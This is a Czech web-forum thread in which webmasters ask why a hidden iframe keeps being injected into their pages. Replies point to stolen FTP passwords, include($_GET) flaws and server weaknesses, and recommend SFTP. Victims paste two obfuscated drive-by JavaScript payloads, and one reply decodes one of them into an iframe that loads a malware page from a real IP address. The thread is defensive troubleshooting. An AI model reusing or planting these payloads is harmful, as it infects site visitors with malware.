Autor Zpráva
tomaseq
Profil *
Zdravím, mám problém s tím, že se mi do internetových stránek automaticky přidává <iframe>, který vede na webové stránky s viry a poté se to stahuje i k návštěvníkům do počítače...

Vždycky to smažu ze zdroje, odpojím se z FTP a do několika dní se to tam autmaticky přidá znovu (ten iframe do zdroje)...mohl by mi někdo poradit co s tím mám dělat?

Týká se to i statických stránek bez redakčního systému a podobných věcí....

Mam přeinstalovanej počítač, bez virů takže nepředpokládám že za to můžu já při připojování na ftp...

Mnohokrát děkuji za pomoc!
djlj
Profil
Změň si heslo na ftp.
pitomec
Profil
kam vede to FTP?
Tommy4
Profil
Pokud nemáš, nastav atributy na 644... jinak je to fakt divný..
pitomec
Profil
ale nektery servery (treba wz.cz) vkladaji do stranek po presunuti na FTP reklamni bannery...jestli to neni chyba na strane serveru..
BetaCam
Profil
Jen takové zběžné pravidla.

1. Udržovat počítač nezavirovaný
2. Nepoužívat Total Commander
3. Nepovolit FTP klientovy, aby si uložil heslo pro automatický přístup.
tomaseq
Profil *
Jedná se o tento frame, který se mi automaticky vloží...
Nemám hostingy na wztku ale u placeného hostingu, děje se to nezávisle na 2 různých serverech od různých poskytovatelů hostingu.

Ukázka, vkládá se to za <body>:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4761d14c2de92(v4761d14c2e677){ return(parseInt(v4761d14c2e677,16));}function v4761d14c2fdd0(v4761d14c3059f){ var v4761d14c30d73='';for(v4761d14c31557=0; v4761d14c31557<v4761d14c3059f.length; v4761d14c31557+=2){ v4761d14c30d73+=(String.fromCharCode(v4761d14c2de92(v4761d14c3059f.sub str(v4761d14c31557, 2))));}return v4761d14c30d73;} document.write(v4761d14c2fdd0('3C5343524950543E77696E646F772E737461747 5733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E6 16D653D34663538303634623366207372633D5C27687474703A2F2F37372E3232312E3 133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D617 4682E72616E646F6D28292A3237333830292B27626164615C272077696474683D33373 0206865696768743D3734207374796C653D5C27646973706C61793A206E6F6E655C273 E3C2F696672616D653E27293C2F5343524950543E'));</script>
tomaseq
Profil *
Mam u souborů nastavené 644, připojuju se pomocí PSPadu, vir se mi vkládá pouze do indexu...

Co mam používat bezpečnějšího pro ftp přístup?

Změna hesla na ftp nepomohla...
tomaseq
Profil *
kam vede to FTP?


Na placený hosting u 2 různých webhostingových společností, tj. nemyslím si že by se proti mě spikli :)
djlj
Profil
Tak tam máš asi nějakej nebezpečnej skript typu include($_GET['page']), pomocí kterýho někdo vyvolá vzdálenou stránku, a ta změní obsah souborů.
Alphard
Profil
BetaCam
Nepoužívat Total Commander
můžeš to trochu rozvést?
Měsíček
Profil
Souhlasím s BetaCam opravdu používat "Total Commander" je blbost, pokud chce být člověk poctivý platí za něco co může mít zadarmo, bez tohohle programu a na ftp je tisíce lepších stačí se podívat na " Http://www.filehippo.com " nebo na " Http://www.stahuj.cz/ ".
Alphard
Profil
Měsíček
nevím, proč sem taháš placení programu a diskuze o tom, jestli jsou tisíce lepších
tohle téma je o virech a mě zajímá, jestlí má BetaCam v souvislosti s tímto důvod ke své radě
Měsíček
Profil
Když si přečteš BetaCamovy rady možná pochopíš více a nevidím NIKDE zásadu, že se musí všichni držet nadpisu ;) mají řešit problém a je jedno jakou cestou.
Alphard
Profil
Když si přečteš BetaCamovy rady možná pochopíš více
asi nejsem chápavý
nevidím NIKDE zásadu, že se musí všichni držet nadpisu
Odpovídejte jenom na to, na co se tazatel ptal. Držte se tématu.
mají řešit problém
v tomto případě viry, ne nejlepší FTP klient
je jedno jakou cestou
myslíš, že účel vždy ctí prostředky?
Měsíček
Profil
Si nechápavej nebo co ??

1. Udržovat počítač nezavirovaný
2. Nepoužívat Total Commander
3. Nepovolit FTP klientovy, aby si uložil heslo pro automatický přístup.

První rada by ho mohla naučit, že viry jsou schopny odesílat data v tomto případě hesla, nepoužívat Total Commander protože má díry, nepovolovat FTP klientovy, aby si uložil heslo pro automatický přístup, protože vir si ho pak klidně může vzít. Copak to není k tématice??
Alphard
Profil
1. a 3. je jasné
nemusíš to vysvětlovat
chci pouze věrohodný důkaz o tom, že jsou v Total Commanderu díry
BetaCam
Profil
Alphard

Já ale přece o dírách nic neřikal. Total Commander je skvělí a kvalitní program který používají milióny a milióny lidí a právě proto je velmi často "vyhledáván" tvůrci virů. Uvedl sem ho pouze proto, že v našich zeměpisných šířkách je tento program velice oblíbený. Problém Total Commanderu stejně jako hodně dalších programů je slabá encryptace úložených hesel. Bylo to spíše doporučení, protože pokud někdo ukládá hesla pro automatický přístup zadělává si na problém. Pokud ještě navíc používá TC je ten problém o to větší díky oblíbenosti TC a jeho slabé encryptaci hesel. Lépe řečeno pokud nedodržuju dob 3. a nedokážu zaručit bod 1. měl bych radši dodržovat bod 2..

Myslím si, že toto doporučení je víc než na místě a omlouvám se, že sem to v prvním příspěvku nerozvedl a mohlo to tedy znít jako zavádějící argument.
Aleš Janda
Profil
tomaseq
Tak ten skript vloží do dokumentu toto:
<SCRIPT>window.status='Done';document.write('<iframe name=4f58064b3f src=\'http://77.221.133.188/.if/go.html?'+Math.round(Math.random()*273 80)+'bada\' width=370 height=74 style=\'display: none\'></iframe>')</SCRIPT>

Co to znamená každý asi rozumí :-)
Zajímavé, že to na té výsledné stránce vrací 403, možná to chce poslat ten správný Referer či co :-)

Jinak $ host 77.221.133.188
188.133.221.77.in-addr.arpa domain name pointer 77.221.133.188.addr.datapoint.ru
Alphard
Profil
BetaCam
Já ale přece o dírách nic neřikal.
Já vím, ta zpráva byla pro Měsíčka. S tím, co jsi teď napsal, víceméně souhlasím, ale ten původní bod by lzavádějící, to jsi sám uznal.

tomaseq
podobná věc se tady už řešila, pokoušeli jsme se to rozšifrovat, ale je to asi zbytečná snaha, hlavní je zabránit tomu, zaměřil bych se na díru v aplikaci, jak psal djlj
BetaCam
Profil
ale ten původní bod by lzavádějící, to jsi sám uznal.

Jiste taky sem se za to omluvil :)

zaměřil bych se na díru v aplikaci, jak psal djlj

ano to určite.

a přecejenom bych otestoval PC na vir

Trojan-Clicker.HTML.IFrame

a jeho mutace.

Doporučuju Antivir Kaspersky
tomaseq
Profil *
To djlj: Máš pravdu, includování používám ale pouze v rámci stránky, kdy si includuju třeba nastavení do sql apod. neincluduju nic jiného, je možné že je to tím, ale když to tam potřebuju naincludovat, tak jak jinak to mám udělat?
Výpis funkcí třeba hlavicka(); paticka(); kdy si potřebuji tuto patičku vložit, ale nechce se mi jí v případě nějakých problémů upravovat na každé stránce také vadí?

Díky...
BetaCam
Profil
tomaseq

Máš pravdu, includování používám ale pouze v rámci stránky, kdy si includuju třeba nastavení do sql apod. neincluduju nic jiného, je možné že je to tím, ale když to tam potřebuju naincludovat, tak jak jinak to mám udělat?

Pokud používáš include typu include 'foo.php'; je to v podstatě jedno, protože link na soubor je natvrdo zapsán ve scriptu a uživatel (útočník) nemá šanci ho změnit.

djlj myslel include, který je vázaný na vstupní data od uživatele. Tedy například include $_GET['page'].'.php'; a tak dále.
milbr
Profil *
Dobrý den, mám stejný problém se škodlivým kódem na stránkách.
Používám na stránkách návštěvní knihu jako autorizaci odeslaných dat používám opis číselného kódu.
Spravuji asi 25 domén na různých severech a problém mám jen s jedním a na jednom serveru.
Myslíte si že je chyba hlavně u mne nebo by mohlo jít i o špatně zabezpečený server?
Děkuji Milan
Medvidek
Profil *
Tahle se yase vklada uz pres rok me ....
<script language='JavaScript'>function ndfc() {var t,o,l,i,j;
var s='';s+='0600471161011201160971161010970620600471161011201160971141010 97062';
s+='060105102114097109101032115114099061034104116116112058047047116114 097102102108111097100115046105110';
s=s+'04710511004609910310506310010110209711710811603403211910510011610 4061034049034032104101105103104116';
s=s+'06103404903403211511612110810106103410010511511210809712105811011 1110101034062060047105102114097109';
s=s+'101062';t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));
document.write(String.fromCharCode(t));t='';}}ndfc();</script>
AM
Profil *
Chyba je vzdycky jedna z techto:
1. nekdo vam ukradl heslo, at uz virem z pocitace, okoukal pres rameno atd...
2. mate chybu v zabezpeceni skriptu (vyse diskutovane include $_GET['neco']
3. je chyba v zabezpeceni serveru
Reseni:
1. projedte PC antivirovym programem a zmente heslo, priste na nej davejte vic pozor
2. opravte skript (pokud mate stranku bez serverovych scriptu, mate ovsem jistotu, ze timhle to neni)
3. napiste spravci hostingu

Pokud sem napisete, ze se vam vklada vir do stranky, tak pokud mezi prispevateli neni vedma, tak vam nikdo nerekne, ktery z tech 3 bodu to je.
HanzXX
Profil *
Mám naprosto ten samý problém, spravuju několik webů na různých placených a poměrně slušných serverech, nezívisle na sobě, ve všech se objevil výše zmíněný script. Podezření mám skutečně na totalcomander, ve kterém jsem měl uložena hesla pro jednotlivá ftp. PHP ve stránce bych z podezření vynechal, jelikož to jsem měl použité jen na jednom webu ze tří napadených (ostatní jen html). Na kompu mám legální a pravidelně aktualizovaný kaspersky. Problém se ale vrací a po čase to tam mám znovu.
Teď budu žádat o změnu hesel a zároveň přestanu ukládat hesla v total comanderu (nejspíš změním úplně ftp klienta). Doufám že tím se problému zbavím.
xa
Profil *
Změnte si hesla na ftp a hesla si neukládejte do Total Comanderu, tim padem je problem vyresen...
srigi
Profil
A pokial mozno, pouzivajte protokol SFTP. Normalne FTP prenasa hesla v plaintexte.
TM
Profil *
take jsem zapasil s podobnym problemem - jednou to byla kradez databaze hesel z flashdisku (uznavam moje blbost), ale podruhe uz to bylo odposlechem FTP komunikace (heslo neni nikde ulozene) - takze bych doporucil misto FTp teba SCP,...
Toto téma je uzamčeno. Odpověď nelze zaslat.